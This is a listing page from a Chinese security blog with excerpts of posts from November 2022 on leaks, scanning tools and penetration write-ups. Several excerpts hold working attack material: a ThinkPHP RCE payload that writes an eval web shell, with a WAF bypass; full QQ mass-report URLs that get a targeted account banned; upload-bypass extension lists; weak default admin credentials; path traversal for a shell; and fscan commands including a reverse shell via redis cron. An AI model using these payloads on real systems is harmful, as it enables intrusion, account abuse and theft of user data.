中华民族的伟大复兴事业,凝结了包括江泽民同志在内的一代又一代共产党人的心血和奋斗。前进道路上,全党全军全国各族人民要在以习近平同志为核心的党中央坚强领导下,高举中国特色社会主义伟大旗帜,全面贯彻习近平新时代中国特色社会主义思想,弘扬伟大建党精神,坚定信心、同心同德,埋头苦干、奋勇前进,为全面建设社会主义现代化国家、全面推进中华民族伟大复兴而团结奋斗。 江泽民同志永垂不朽! ...

    2022-11-30 值得一看 55
  • 难怪马斯克裁掉整个安全部门,推特540万用户数据在暗网公开

    就在马斯克宣布裁撤整个安全部门之后,Twitter再次传来一个重磅消息,超过540万条用户数据已经在暗网公开,并且免费共享给所有人。此外,安全人员还披露了另外一个可能泄露的,规模更大的数据库,其中包含了上千万条Twitter数据。 这些数据包含了大多数的公共信息,包括包括帐户的 Twitter ID、名称、屏幕名称、已验证状态、位置、URL、描述、关注者数量、帐户创建日期、好友数量、收藏夹数量、状态计数和个人资料图像 URL;以及较为私密的用户的电子邮件和电话号码等信息。一旦这些信息在暗网爆发开来,那么意味着数百万的Twitter用户将有可能面临潜在的网络钓鱼攻击。   数据泄露6个月后才修复漏洞   根据国外媒体报道,2022年8月5日,Twitter在其隐私中心发布声明,确认此前被曝出的540万个账户信息泄露事件确实存在。 Twitter表示,之所以直接发布这一声明,是因为无法确认每一个可能受到影响的账户,因此无法单独向账户发送信息泄露警告。“拥有匿名账户的人需要尤其注意,他们可能会被政府或其他人锁定目标。”Twitter在声明中强调。 被黑客利用的漏洞是Twitter 在2021年6月更新时引入的:如果有人向Twitter系统提交一个电子邮件地址或电话号码,Twitter系统会回复相关联的账户信息。 2022年1月1日,网络安全平台Hackerone用户zhirinovsky报告了这一漏洞,并在Twitter的漏洞奖励计划中获得5040美元的奖励。根据报告,该漏洞对拥有私人或匿名账户的用户构成了“严重威胁”,可能被用来“创建数据库”,或通过大数据分析出Twitter的用户画像。 得知此事后,Twitter立即进行了调查和修复。当时没有证据表明有人利用了这个漏洞,然而这已是漏洞被引入代码库的6个月之后。Twitter并未在隐私中心对此发表任何说明。 7月21日,媒体RestorePrivacy注意到一位新用户在黑客论坛上以3万美元出售Twitter数据库,称涉及540万用户,包括“从名人到公司”的用户数据。RestorePrivacy验证发现,受害者来自世界各地,这些被泄露的数据包括与Twitter账号绑定的电子邮件、电话号码、公开的个人资料信息,并可以与真实的人相匹配。 这已经不是Twitter第一次发生大规模数据泄露事件,2019年1月,Twitter披露了其修复的一个安全漏洞,而在此前四年多的时间里,该漏洞使得许多用户的私人推文被泄露。而此次数据泄露也是漏洞引起,并且经过长达六个月的时间才修复完成。 难怪马斯克一上任就裁掉了Twitter整个安全部门,作为全球大型社交平台之一,其安全能力属实无法令人满意。 数据泄露的远比想象中的多 但更糟糕的消息还在后面,免费共享540 万条用户数据的发布者称,这仅仅是Twitter数据泄露的一部分,他们还窃取了更多的用户数据。据悉这些泄露的Twitter数据已经达到千万级,其中包括使用相同 API 错误收集的个人电话号码,以及公共信息,包括已验证状态、帐户名、Twitter ID、个人简介和屏幕名称。 Loder 最早在Twitter上发布了上述更大数据泄露的消息,发帖后不久他就被停职。Loder随后在Mastodon上发布了这个更大规模数据泄露的编辑样本 。 Loder分享更大漏洞的消息 有安全专家通过这个未知的数据库的样本文件,对其中信息的真实性进行了核实。结果发现,包括电话号码在内的信息全部都真实有效,这也从侧面证明了此次千万级数据泄露是真实存在的。 此外,这些用于核实的信息都没有出现在 8 月份出售的原始数据中,这说明 Twitter 的数据泄露比之前披露的要严重得多,而且攻击者之间流传着大量的用户数据。 安全专家Pompompurin表示,目前不知道是谁创建了这个新发现的数据转储,表明其他人正在利用这个 API 漏洞。这个新发现的数据转储由许多按国家和地区代码分解的文件组成,包括欧洲、以色列和美国。 有消息称这个泄露的数据库存储的信息量有可能达到2千万条,其泄漏量之大令人震惊,因此Twitter用户应提高警惕,仔细检查任何声称来自Twitter的电子邮件,避免陷入网络钓鱼攻击的陷进之中。 ...

    2022-11-30 值得一看 73
  • 斗象DayBreak自动化渗透测试工具

    斗象DayBreak自动化渗透测试工具 核心特性: 1.实战化: 依托漏洞盒子10W+白帽多年沉淀下来的攻防经验,从实战出发,以专业视角将经验转化为产品能力 2.轻量化: 通过非常轻量级地方式安装软探针,即用即走可无限拓展,保障有效性的同时更加方便快捷 3.自动化: 内置多个扫描引擎,周期化、自动化、可持续性地执行任务,实现全场景、全时段、模拟攻击评估 4.社区化: 鼓励企业安全部门像“黑客”一样思考和行动,打造开放包容,人人都是“开发者”的社区精神 支持多平台(win, linux, macos) 下载 DayBreak: 前往https://daybreak.tophant.com/ 进行下载 首次打开会进入激活页面,需要前往 https://daybreak.tophant.com/ 填写QQ邮箱申请 ...

    2022-11-28 实用工具 56
  • 2022HVV POC合集

    =================================== 免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。 0x01 工具介绍 泛微云桥e-Bridge存在SQL注入漏洞 2022/7/11 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-11894 Apache Commons远程代码执行漏洞(CVE-2022-33980) 2022/7/7 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-10567 GitLab远程代码执行漏洞(CVE-2022-2185) 2022/7/1 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-10296 泛微OA存在SQL注入漏洞(CNVD-2022-43843) 2022/6/30 新近真实漏洞 https://www.cnvd.org.cn/flaw/show/CNVD-2022-43843 通达OA存在代码执行漏洞 2020/8/20 历史真实漏洞 https://mp.weixin.qq.com/s/II1s-xwn4lD5_couvadI9g 用友U8-OA企业版存在SQL注入漏洞(CNVD-2022-31182) 2022/4/30 新近真实漏洞 https://www.cnvd.org.cn/flaw/show/CNVD-2022-31182 泛微OA存在命令执行漏洞(CNVD-2022-06870) 2022/2/13 新近真实漏洞 https://www.cnvd.org.cn/flaw/show/CNVD-2022-06870 FastJson代码执行漏洞 无已知公开的与情报对应的新近漏洞 致远A8 getshell 2019/6/26 历史真实漏洞 https://cn-sec.com/archives/1101195.html 禅道存在SQL注入漏洞(CNVD-2022-42853) 新近真实漏洞 FastJson代码执行漏洞 (CVE-2022-25845) 2022/5/23 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-7654 万户OA getshell 历史真实漏洞 http://cn-sec.com/archives/75986.html 蓝凌OA远程代码执行漏洞 2021/4/9 历史真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2021-13023 拓尔思mas5 getshell 2022/4/28 新近真实漏洞 https://www.little2pig.work/archives/trs-mas http://cn-sec.com/archives/960259.html thinkphp远程代码执行漏洞 2018/12/9 历史真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-11895 jboss EAP /AS 6.远程代码执行 2019/12/11 历史真实漏洞 https://packetstormsecurity.com/files/167730/JBOSS-EAP-AS-6.x-Remote-Code-Execution.html https://s3.amazonaws.com/files.joaomatosf.com/slides/alligator_slides.pdf thinkphp任意文件读取 2018/12/9 历史真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-11895 明御Web应用防火墙任意登录 2022/7/24 历史真实漏洞,安恒已辟谣存在新近漏洞 http://cn-sec.com/archives/1196646.html Laravel存在命令执行漏洞(CNVD-2022-44351) 2022/6/7 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-8513 安恒web应用防火墙远程命令执行漏洞 2022/7/24 历史真实漏洞,安恒已辟谣存在新近漏洞 https://mp.weixin.qq.com/s/VdCjgxDL9qoAWIax5G3e0g http://cn-sec.com/archives/1196646.html 某软sdp软件定义边界系统命令执行漏洞 无已知公开的与情报对应的新近漏洞 某软网络准入控制系统反序列化漏洞 无已知公开的与情报对应的新近漏洞 某某服VPN存在远程缓冲区溢出漏洞(非web端口) 无已知公开的与情报对应的新近漏洞,深信服已辟谣,历史相关的漏洞见相关链接 https://security.sangfor.com.cn/index.php?m=&c=page&a=view&id=19 https://security.sangfor.com.cn/index.php?m=&c=page&a=view&id=18 某盟NF防火墙版本<6.0.3.198存在远程命令执行漏洞 无已知公开的与情报对应的新近漏洞 qax天擎版本<6.7.0.4910存在安全漏洞 无已知公开的与情报对应的新近漏洞 通达 OA 后台 SQL 注入漏洞 2022/7/25 新近真实漏洞 https://mp.weixin.qq.com/s/HU-KxA75PR3u47QOqKWktQ 通达 OA 后台文件上传漏洞 2022/7/25 新近真实漏洞 https://mp.weixin.qq.com/s/HU-KxA75PR3u47QOqKWktQ 华天动力OA前台任意文件上传漏洞 2022/7/25 存在性未确认,且大概率不影响最新版本 启明星辰天玥网络安全审计系统SQL注入0day 2021/7/15 历史真实漏洞 https://woj.app/7183.html uniview监控设备oday 2018/2/7 历史真实漏洞 https://vulners.com/zdt/1337DAY-ID-29739 蓝凌OA授权RCE和未授权RCE 2022/7/12 新近真实漏洞 https://mp.weixin.qq.com/s/zV4h5d9DrI7Nm49suSzIWw PHP 8.1.0-dev RCE 2021/5/23 历史真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2021-27111 泛微Office 10 SQL注入漏洞 2021/8/13 历史真实漏洞 https://www.buaq.net/go-86552.html org.webjars:dojo 包 <1.17.2 多个漏洞 2021/7/31 历史真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2021-3594 锐捷网络设备多个存在逻辑漏洞,可绕过身份验证登录多个系统 2022/6/21 新近真实漏洞 疑似用友NC 0day 2021/11/15 历史真实漏洞 https://www.cnsrc.org.cn/hw/1911.html https://decoded.avast.io/janneduchal/analysis-of-attack-against-national-games-of-china-systems/ Coremail Air邮件客户端附件后缀名显示不正确 2022/7/26 新近真实漏洞,厂商已确认 https://community.icoremail.net/article/460?bsh_bid=5789296111 泛微 V9 文件上传漏洞 2022/7/26 存在性未确认 小鱼易连疑似0day 2022/7/26 存在性未确认 泛微 E-office 文件包含漏洞(CNVD-2022-43247) 2022/6/8 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-11900 泛微 E-office SQL 注入漏洞(CNVD-2022-43246) 2022/6/8 新近真实漏洞 https://nox.qianxin.com/vulnerability/detail/QVD-2022-11899 禅道 v16.5 SQL注入漏洞 2022/7/25 新近真实漏洞 https://github.com/z92g/ZentaoSqli 0x02 项目链接下载 添加下方QQ群...

    2022-11-26 实用工具 69
  • phpems7.0代码执行漏洞

    前言 今天拿到一篇某前辈发的代码审计文章,就复盘了一下,目前暂时没看到升级版,或者是补丁,目前也处 于0day状态 参考文章https://mp.weixin.qq.com/s/DD0lJD_COKLzF-HBPYvIwQ 环境搭建 本机环境: apeche2.4.39 ftp0.9.60 mysql5.7.26 代码审计分析 app/content/cls/api.cls.php 此处可以看到当blocktype==4的时候执行以下代码 可以看到eval中存在变量$tp 发现其调用函数fetchContent 全文追踪此函数 /lib/tpl.cls.php 进一步追踪compileContentTpl函数 对其中函数进行全部追踪发现再此处仅仅只是做了无关紧要的正则过滤并不影响我们的输入与输出 回到位置继续追踪$tp的值: html_entity_decode函数的作用将html实体编码的值转化为字符 追踪stripSlashes函数方法: lib/ev.cls.php 发现此处操作为将sql注入的转义的/去除 且此处发现blocktype的值 分析此段代码得结论,那么就是需要控制blocktype的值为4和blockcontent的值为我们想要使用的php 代码那么就可以造成代码执行漏洞 /app/content/cls/api.cls.php 看到产生漏洞的函数方法parseBlock 可以看出函数中blocktype的值由getBlockById($blockid)此处控制 定位此函数方法的函数 /app/content/cls/block.cls.php 根据框架预先定义好的数据库查询方法可以得知此处为数据库增加查询语句,查询blockid表中的数据查 询条件为$blockid值, 函数eval在传入$tp值并没有加入有效的过滤,那么此处只要我们可以控制数据表中的内容和blocktype 的值,并且可以控制传参那么此代码执行就生效 根据上诉代码可以得到存在调用/app/content/cls/block.cls.php getBlockById方法就可能存在代码执行 漏洞 /app/content/controller/blocks.master.php 此处modify方法调用getBlockById get指的是通过get方法获取,stripSlashes对$block['blockcontent']进行了html实体化,和sql注入的过 滤 由于再我们发现漏洞处的位置,代码对传入的值进行去html和删除转义字符的处理从而导致漏洞的存在 ...

    2022-11-25 未分类 58
  • 私服通用0Day复现getshell

    看了个私服站,网上搜下漏洞,还真有day,但是没有写getshell方法,我复现看看吧 后台地址:http://url/admin 一个通用的万能账号弱口令: 账号是 lu123 密码 cui123 利用day成功进入后台 传个图片马,然后有个数据库,直接备份数据库,getshell到手 ...

    2022-11-24 技术教程 53
  • Web漏洞扫描器 -- SZhe_Scan

    0x01 工具介绍 碎遮SZhe_Scan Web漏洞扫描器,基于python Flask框架,对输入的域名/IP进行全面的信息搜集,漏洞扫描,可自主添加POC。 0x02 安装与使用 1、安装 git clone https://github.com/Cl0udG0d/SZhe_Scancd SZhe_Scandocker-compose up -d 2、使用方法 访问ip:8000 即可,默认账户密码为:admin@admin.com / admin选择需要的POC和插件,添加任务进行扫描即可 0x03 项目链接下载 加入下方交流群...

    2022-11-23 技术教程 42
  • 可控文件拿shell

    挖洞的时候遇到一个平台 爆破进入后台 下一步肯定是找上传点然后拿shell是吧 确定上传 java站,改成jsp后缀试试 好,可以发现并不是filename控制文件后缀 那估计是str控制了 访问 http:/XXX.XXX/wb/upload/7D4B487AFAC49B42E472A8AB1D60D702.jsp 直接下载。。(一般遇到这种情况就放弃了) 再观察一下请求包 是不是能控制文件名 果然可以,能控制文件名是不是就可以跨目录了 http://xxx.xxx/wb/upload/../../test.jsp 等于http://xxx.xxx/test.jsp 尝试连接 直接administrator权限 ...

    2022-11-21 技术教程 35
  • 抽奖诈骗网站的渗透

    网站是这样的,他是利用短视频发布免费皮肤领取的视频,扫码进入这个网页,然后扫码进群再进行诈骗。 报错判断为think PHP框架 试试RCE POST: http://xxxx.xxxx.com/?s=index/index/ s=-1&_method=__construct&method=get&filter[]=phpinfo 为php5,尝试写shell POST http://xxx.xxx.com/?s=index/index s=file_put_contents('1.php','<?php eval($_POST[x])?>')&_method=__construct&method=POST&filter[]=assert 宝塔waf 经过多次实验,宝塔应该是拦截了_POST[关键字,下面我们尝试绕过 在php里面我们可以使用'.'拼接符来连接前后的语句 <?php ev'.'al($_PO'.'ST[x])?>相当于<?php eval($_POST[x])?> POST: http://xxx.xxx.com/?s=index/index s=file_put_contents('1.php','<?php ev'.'al($_PO'.'ST[x])?>')&_method=__construct&method=POST&filter[]=assert 写shell成功 访问http://xxx.xx/1.php 菜刀连接成功 宝塔限制的太死了,提权不了 ...

    2022-11-21 技术教程 53
  • 文件上传漏洞 部分解析后缀

    文件上传漏洞部分解析后缀 asp/aspx: asp,aspx,asa,asax,ascx,ashx,asmx,cer,aSp,aSpx,aSa,aSax,aScx,aShx,aSmx,cEr php: php,php5,php4,php3,php2,pHp,pHp5,pHp4,pHp3,pHp2,html,htm,phtml,pht,Html,Htm,pHtml jsp: jsp,jspa,jspx,jsw,jsv,jspf,jtml,jSp,jSpx,jSpa,jSw,jSv,jSpf,jHtml ...

    2022-11-21 实用工具 39
  • 内网综合扫描工具 -- fscan

    ================================== 免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。 0x01 工具介绍 一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 0x02 安装与使用 fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)fscan.exe -hf ip.txt (以文件导入)fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx(wmiexec无回显命令执行) 0x03 项目链接下载 1.加巅峰阁QQ群,群文件下载 ...

    2022-11-21 实用工具 45
  • 对一次色情站点的渗透测试(苹果CMS)

    在某聊天软件学习技术看到有人卖色情站源码,自称苹果CMS三开,呢我肯定要看看,为后续打击违规站点做功课 现来看看代理后台 后台无可利用点,TP框架试着用TP工具扫了一下并无发现漏洞 这个代理后台渗透无望,尝试信息收集,在找了8页后找到了个激活码页面,应该是给下线激活域名的 看到这个查询框,果断burp,仍sqlmap跑一下 运气比较好,存在sql注入漏洞 那么现在就比较简单了,典型的苹果cms表前缀 那么问题来了,如何找到他后台,后台输入admin.php,admin 均为页面不存在 那只好利用我的社工手段了(忽悠大法) ok,后台地址到手,利用SQL注入跑出密码,成功登录后台 后台是苹果10cms,网上看了getshell方法,模板什么的,均无果。 总结: 注册用户信息6千多 代理273个 包括代理登录日志,管理日志已经全脱出来了。 奉劝各位,请勿跨越法律红线。...

    2022-11-20 技术教程 70
  • QQ大规模封号事件分析

    最近两天QQ出现了大规模封号的情况,当然,我在推送群里的几个QQ也被封了,自己用的大号还健在。 结果就有热心网友找到了漏洞相关的POC,先对马叔叔(10001)进行了一波尝试,结果发现没有效果。 然后就拿我大号进行了测试,当时,我正好在吃饭,结果GG了……  0:00 / 00 漏洞产生的原因 客户端版本较多导致可能存在一些没有废弃的旧版接口 可以在URL中修改eviluin、text_evidence字段,就可以修改要举报的QQ号和证据 漏洞POC 目前看应该是已经和谐了,我们将其中的URL也分享出来供大家学习参考 漏洞URL样本一 您需要将QQ号替换为目标的QQ号 https://jubao.qq.com/uniform_impeach/impeach_entry?system=PC&version=5887&appname=PCQQ&appid=2400002&subapp=group_vote&scene=20001&uintype=1&eviluin=https://jubao.qq.com/uniform_impeach/impeach_entry?system=PC&version=5887&appname=PCQQ&appid=2400002&subapp=group_vote&scene=20001&uintype=1&eviluin=QQ号&evilnick=%E7%8C%AA%E7%8C%AA%E4%BE%A0&srv_para=chatmsg:&text_evidence=%E6%8A%95%E7%A5%A8%E6%A0%87%E9%A2%98:%E7%99%BE%E5%AE%B6%E4%B9%90;%E9%80%89%E9%A1%B91:%E6%93%8D%E4%BD%A0%E6%AF%8Dk%E4%BD%A0b%E6%AD%BBb;%E9%80%89%E9%A1%B91;&img_evidence=&url_evidence=&video_evidence=&file_evidence=&audio_evidence=&user_input_param=&cryptograph=5773555d36d3e9fecc805877688f24af&salt=e9db1f69eb6c5cf54f8312227f405bcc&seqid=1037948812520221013&is_fake=0&impeach_tel=1&3eeaade917a2c33cc4710031c653b2bd885cbb42&input=%E7%A1%AE%E5%AE%9A&evilnick=%E7%8C%AA%E7%8C%AA%E4%BE%A0&srv_para=chatmsg:&text_evidence=%E6%8A%95%E7%A5%A8%E6%A0%87%E9%A2%98:%E7%99%BE%E5%AE%B6%E4%B9%90;%E9%80%89%E9%A1%B91:%E6%93%8D%E4%BD%A0%E6%AF%8Dk%E4%BD%A0b%E6%AD%BBb;%E9%80%89%E9%A1%B91;&img_evidence=&url_evidence=&video_evidence=&file_evidence=&audio_evidence=&user_input_param=&cryptograph=5773555d36d3e9fecc805877688f24af&salt=e9db1f69eb6c5cf54f8312227f405bcc&seqid=1037948812520221013&is_fake=0&impeach_tel=1&3eeaade917a2c33cc4710031c653b2bd885cbb42&input=%E7%A1%AE%E5%AE%9A 我们分析下上面的一些字段,目标QQ号使用的是eviluin,举报证据字段如下 text_evidence=%E6%8A%95%E7%A5%A8%E6%A0%87%E9%A2%98:%E7%99%BE%E5%AE%B6%E4%B9%90;%E9%80%89%E9%A1%B91:%E6%93%8D%E4%BD%A0%E6%AF%8Dk%E4%BD%A0b%E6%AD%BBb;%E9%80%89%E9%A1%B91; 通过URL解码,我们可以看到里面有一些关键词,正是命中了这些关键词导致的用户被立刻封号 漏洞URL样本二 QQ号需要修改为目标QQ号 https://jubao.qq.com/uniform_impeach/impeach_entry?system=PC&version=5887&appname=PCQQ&appid=2400002&subapp=group_vote&scene=20001&uintype=1&eviluin=QQ号&evilnick=%E7%8C%AA%E7%8C%AA%E4%BE%A0&srv_para=chatmsg:&text_evidence=%E6%8A%95%E7%A5%A8%E6%A0%87%E9%A2%98:%E7%99%BE%E5%AE%B6%E4%B9%90;%E9%80%89%E9%A1%B91:%E6%93%8D%E4%BD%A0%E6%AF%8Dk%E4%BD%A0b%E6%AD%BBb;%E9%80%89%E9%A1%B91;&img_evidence=&url_evidence=&video_evidence=&file_evidence=&audio_evidence=&user_input_param=&cryptograph=5773555d36d3e9fecc805877688f24af&salt=e9db1f69eb6c5cf54f8312227f405bcc&seqid=1037948812520221013&is_fake=0&impeach_tel=1&3eeaade917a2c33cc4710031c653b2bd885cbb42&input=%E7%A1%AE%E5%AE%9A 以上两个样本可以造成封号1、7天,其实就是利用了这些字段可以随意修改,而且大概率是从旧版电脑QQ上遗留的部分功能导致的。因此,做安全喜欢考古是一个很不错的思路,比方说从以前的老版本的应用上寻找一些可能还遗留的接口进行参数篡改,就会导致网上说的这种无违规(wwg)封号的情况 POC验证 在输入上面的URL,在手机客户端访问后,可以看到举报成功 当然我自己的号也不例外,被热心网友安排了一天的套餐 你可以去安全中心,输入对应的QQ检测封号情况 https://accounts.qq.com/login/limit 目前可以看到很多大佬的QQ都因为这个漏洞被临时封禁了 很多短位或者靓号也被热心网友给搞封了 这个漏洞目前应该是已经修复了,而且通过这个漏洞被封禁的账户现在也都解封了 ...

    2022-11-20 实用工具 138
  • app敏感信息工具

    目前提取了APK内: 所有字符串 所有URLs 所有ip 可能是hash值的字符串 存在的敏感词(如oss.aliyun) 可能是accessKey的值 使用Python开发,依赖于apkutils模块,可执行文件使用pyinstaller打包。 链接: https://pan.baidu.com/s/11kbWMdoFUX8qnsb3FvySBg 提取码: pr39 ...

    2022-11-20 实用工具 55

联系我们

在线咨询:点击这里给我发消息

QQ交流群:

工作日:8:00-23:00,节假日休息

扫码关注